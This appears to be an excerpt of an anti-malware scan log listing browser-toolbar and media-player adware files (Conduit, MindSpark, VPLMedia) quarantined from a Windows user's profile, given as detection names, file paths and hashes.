PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Local\CRE\knhpkjjdbjjchglnophlnghcdefpanlc.crx, Quarantined, [055af43d3259c5719880af81b152c739],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\tbccint.xml, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\conduit.xml, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.1000082.currentList, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.1000082.localStations, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.1000082.nowPlaying, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.1000082.publisherStations, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.1000234.weatherData, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.130189644128799177.search.selectedEngineId, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.130189644128799177.search.settings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.appOptions, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.cookiesRepo, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.fullUserID, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.installUsage, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_translation, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_searchAPI, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_serviceMap, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_toolbarContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_toolbarSettings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_translation, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_appsMetadata, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_appTrackingFirstTime, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_Configuration, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_gottenAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_login, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_otherAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_searchAPI, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_serviceMap, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.installUsageEarly, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_otherAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_toolbarContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_toolbarContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_toolbarSettings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.NotificationSettings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.NOTIFICATION_ID.notifications-repository, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.NOTIFICATION_ID.notifications-servicemap, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.NOTIFICATION_ID.notifications-service_1794562, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.searchProtectorData, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762.UserID, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_appsMetadata, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_appTrackingFirstTime, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_Configuration, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_gottenAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.22.5.10.serviceLayer_services_login, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_toolbarSettings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.37.0.508.serviceLayer_services_translation, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_appsMetadata, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_appTrackingFirstTime, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_Configuration, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_gottenAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_login, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_otherAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_searchAPI, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_serviceMap, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\originalSearchEngine.xml, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbar_initializing_logger.txt, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\uninstallData, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\uninstallUrl, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_toolbarSettings, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_10.38.0.509.serviceLayer_services_translation, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_appsMetadata, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_appTrackingFirstTime, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_Configuration, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_gottenAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_login, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_otherAppsContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_searchAPI, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_serviceMap, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\CT3309762_RAW.serviceLayer_services_toolbarContextMenu, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_48_326_CT3266648_Images_635018305504103597.png, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_BankImages_Facebook_Facebook.png, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_bankimages_iconsGallery_24_5495315885042679229.png, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_images_ClientImages_radio.gif, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_images_components_separator.gif, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_images_searchengines_search_icon.gif, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_MarketPlace_81_28e_816147d9-d2b0-4dc7-b220-fb7ea1b1228e_Appearance_634726106907093173.png, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.ConduitTB.Gen, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\CT3309762\toolbarImages\http___storage_stgbssint_com_MarketPlace_d5_3fe_d5c4c431-a6ed-49fe-9670-df872dce43fe_Appearance_634527283768578406.png, Quarantined, [045b81b07a111125fc21be72a360d22e],
PUP.Optional.Conduit, C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_whitesmokenew.ourtoolbar.com_0.localstorage, Quarantined, [c59ae24f3f4c280ef980870549bbb14f],
PUP.Optional.Conduit, C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_whitesmokenew.ourtoolbar.com_0.localstorage-journal, Quarantined, [86d975bcdab1a393a6d39def56ae02fe],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lkbekmickkafhbgkehknddbfmhddckem_0.localstorage, Quarantined, [ea7573be9bf01f17456e4164669e14ec],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_lkbekmickkafhbgkehknddbfmhddckem_0.localstorage-journal, Quarantined, [fb64072af893f145bdf6cdd82dd7ef11],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\playlist.vpl, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\config.ini, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_193.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_199.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_200.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_201.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_204.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_219.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_221.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_224.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_268.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_28.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_34.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_37.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_49.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_57.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_86.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_99.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_103.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_11.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_120.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_121.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_122.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_123.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_124.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_125.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_126.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_127.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_136.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_137.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_140.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_141.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_149.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_150.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_160.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_165.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_181.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.VPLMedia, C:\Users\Ken Terry\AppData\Roaming\player\images\channel_ld_191.png, Quarantined, [065985ac7813e056670e1aa8956fe818],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\ldb.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lobm.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\btmarrow.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\cancel.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\config.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\continue.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\dispatch.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\divider.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\gcancel.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\index.htm, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\infobar.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\jquery.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\la.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lbcs.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lbms.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lca.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lcfc.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lcm.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
